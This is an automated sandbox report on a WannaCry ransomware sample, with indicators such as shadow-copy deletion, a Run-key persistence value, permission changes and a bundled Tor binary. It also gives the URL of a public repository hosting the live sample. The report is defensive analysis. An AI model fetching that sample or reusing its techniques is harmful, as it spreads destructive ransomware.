Malware Analysis Report

2025-04-13 21:25

Sample ID 240915-kdzz8avejr
Target https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/WannaCrypt0r.zip
Tags
wannacry defense_evasion discovery execution impact persistence ransomware spyware stealer worm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/WannaCrypt0r.zip was found to be: Known bad.

Malicious Activity Summary

wannacry defense_evasion discovery execution impact persistence ransomware spyware stealer worm

Wannacry

Deletes shadow copies

Modifies file permissions

Executes dropped EXE

Drops startup file

Loads dropped DLL

Reads user/profile data of web browsers

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

Sets desktop wallpaper using registry

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Browser Information Discovery

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy WMI provider

Interacts with shadow copies

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Uses Task Scheduler COM API

Views/modifies file attributes

Modifies registry key

Enumerates system info in registry

Modifies Internet Explorer settings

Uses Volume Shadow Copy service COM API

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-15 08:29

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-15 08:29

Reported

2024-09-15 08:33

Platform

win7-20240903-en

Max time kernel

196s

Max time network

196s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/WannaCrypt0r.zip

Signatures

Wannacry

ransomware worm wannacry

Deletes shadow copies

ransomware defense_evasion impact execution

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD2D81.tmp C:\Users\Admin\Desktop\WannaCrypt0r\[email protected] N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\WannaCrypt0r\[email protected] N/A
N/A N/A C:\Users\Admin\Desktop\WannaCrypt0r\[email protected] N/A
N/A N/A C:\Windows\SysWOW64\cscript.exe N/A
N/A N/A C:\Users\Admin\Desktop\WannaCrypt0r\[email protected] N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected] N/A
N/A N/A C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected] N/A
N/A N/A C:\Users\Admin\Desktop\WannaCrypt0r\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\Desktop\WannaCrypt0r\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\Desktop\WannaCrypt0r\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\Desktop\WannaCrypt0r\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\Desktop\WannaCrypt0r\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\Desktop\WannaCrypt0r\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\Desktop\WannaCrypt0r\[email protected] N/A
N/A N/A C:\Users\Admin\Desktop\WannaCrypt0r\[email protected] N/A
N/A N/A C:\Users\Admin\Desktop\WannaCrypt0r\[email protected] N/A
N/A N/A C:\Users\Admin\Desktop\WannaCrypt0r\[email protected] N/A
N/A N/A C:\Users\Admin\Desktop\WannaCrypt0r\[email protected] N/A
N/A N/A C:\Users\Admin\Desktop\WannaCrypt0r\[email protected] N/A
N/A N/A C:\Users\Admin\Desktop\WannaCrypt0r\[email protected] N/A
N/A N/A C:\Users\Admin\Desktop\WannaCrypt0r\[email protected] N/A
N/A N/A C:\Users\Admin\Desktop\WannaCrypt0r\[email protected] N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\lmlkrbkipiq805 = "\"C:\\Users\\Admin\\Desktop\\WannaCrypt0r\\tasksche.exe\"" C:\Windows\SysWOW64\reg.exe N/A

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" C:\Users\Admin\Desktop\WannaCrypt0r\[email protected] N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\WannaCrypt0r\[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\WannaCrypt0r\TaskData\Tor\taskhsvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\DllHost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\vssadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected] N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{AF963701-733C-11EF-86F5-E699F793024F} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\MINIE C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1544 wrote to memory of 1308 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1544 wrote to memory of 1308 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1544 wrote to memory of 1308 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1544 wrote to memory of 1308 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2368 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2368 wrote to memory of 2968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
